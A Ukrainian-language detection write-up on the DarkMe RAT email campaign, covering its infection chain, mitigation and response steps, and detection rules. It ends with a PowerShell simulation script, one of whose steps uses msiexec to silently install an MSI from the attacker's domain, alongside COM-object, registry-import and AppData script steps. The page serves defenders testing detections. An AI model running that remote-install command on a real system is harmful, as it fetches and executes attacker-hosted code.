Кампанія розсилки електронних листів DarkMe розширює цілеспрямованість в атаках APT RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Відзначено нову кампанію, що доставляє шпигунське RAT ПЗ DarkMe, яка покладається на соціальну інженерію замість експлойтів програмного забезпечення. Зловмисники поширюють .pif файл через електронну пошту, який запускає багатоступеневий ланцюжок інфекції, що включає MSIEXEC та декілька завантажувачів на базі VB6. Відмова від експлуатації нульових днів на користь соціальної інженерії вказує на перехід до дешевших, ширших та менш вибіркових методів атаки.
Розслідування
Huntress виявила кампанію після виявлення .pif файлу, що запускає Windows Installer для отримання віддаленого MSI пакету. Аналіз розкрив складний багатоступеневий ланцюг, що включає сценарій підготовки, названий prnfig.wsf, імпорт реєстру та виконання COM об’єкта через rundll32.exe /sta. Останній етап використовує процес підміни для ін’єкції навантаження DarkMe у підписаний бінарник Microsoft clspack.exe.
Пом’якшення
Захисники повинні контролювати rundll32.exe запуск з прапором /sta та GUID без супровідного шляху до DLL. Служби безпеки також повинні виявляти msiexec отримання віддалених MSI пакетів через HTTPS і розслідувати виконання .pif файлів. Підписані бінарники Microsoft, що працюють з незвичних місць, таких як %AppData% потребують додаткового контролю.
Відповідь
Коли виявлено підозрілу діяльність, негайно ізолюйте уражену кінцеву точку, щоб порушити C2-комунікації та запобігти ексфільтрації даних. Завершіть процес підміни та видаліть шкідливі артефакти з clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Видаліть персистентність, створену через призначений URL-протокольний обробник та ключ HKCU Run . Скиньте затронуті облікові дані користувача та розгляньте будь-які локально збережені криптовалютні гаманці як потенційно скомпрометовані.
Потік атаки
Ми продовжуємо оновлювати цю частину.
Виявлення
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через події реєстру)
Незвичайне розширення виконуваного бінарного файлу (через створення процесу)
LOLBAS WScript / CScript (через створення процесу)
Можлива спроба встановлення віддаленого MSI файлу (через командний рядок)
Підозрілі команди та управління за допомогою незвичайного верхнього рівня домену (TLD) DNS запит (через DNS)
Індикатори компрометації (HashSha256) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT
Індикатори компрометації (SourceIP) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT
Індикатори компрометації (DestinationIP) для виявлення: Кампанія електронної пошти DarkMe розширює націлювання для APT RAT
Виявлення C2-комунікацій та домену підготовки для DarkMe RAT [Windows Network Connection]
Виявлення злочинної діяльності у кампанії DarkMe RAT [Windows Process Creation]
Виконання симуляції
-
Сценарій атаки та команди: Зловмисник прагне розгорнути DarkMe RAT для збереження стійкості. Щоб уникнути виявлення на основі підписів, зловмисник використовує
msiexecдля завантаження віддаленого навантаження з компрометованого домену (onlineview365.com). Після початкової інфекції зловмисник використовуєrundll32.exeдля виклику певного COM об’єкта через GUID для виконання коду в пам’яті, а згодом використовуєcmd.exeдля імпорту конфігурацій реєстру з текстового файлу для підготовки середовища для виконанняwscript.exeна базі сценарію навантаження. -
Скрипт регресійного тестування:
# Симуляційний скрипт DarkMe RAT # Цей скрипт імітує точні командні рядки, визначені в правилі Sigma. Write-Host "[+] Початок симуляції DarkMe RAT..." -ForegroundColor Cyan # 1. Імітація віддаленого завантаження msiexec Write-Host "[*] Імітація віддаленого завантаження msiexec..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Імітація виконання COM об'єкта rundll32 Write-Host "[*] Імітація виконання COM об'єкта rundll32..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Імітація імпорту реєстру cmd.exe Write-Host "[*] Імітація імпорту реєстру cmd.exe..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Імітація виконання wscript.exe через ланцюжок батьків/дочірніх процесів cmd/rundll32 Write-Host "[*] Імітація виконання wscript.exe з AppData..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # Щоб активувати конкретне правило батько/дитина: # Батько: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Дитина: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Симуляція завершена." -ForegroundColor Green -
Команди очищення:
# Очищення артефактів симуляції Write-Host "[+] Очищення..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Очищення завершено." -ForegroundColor Green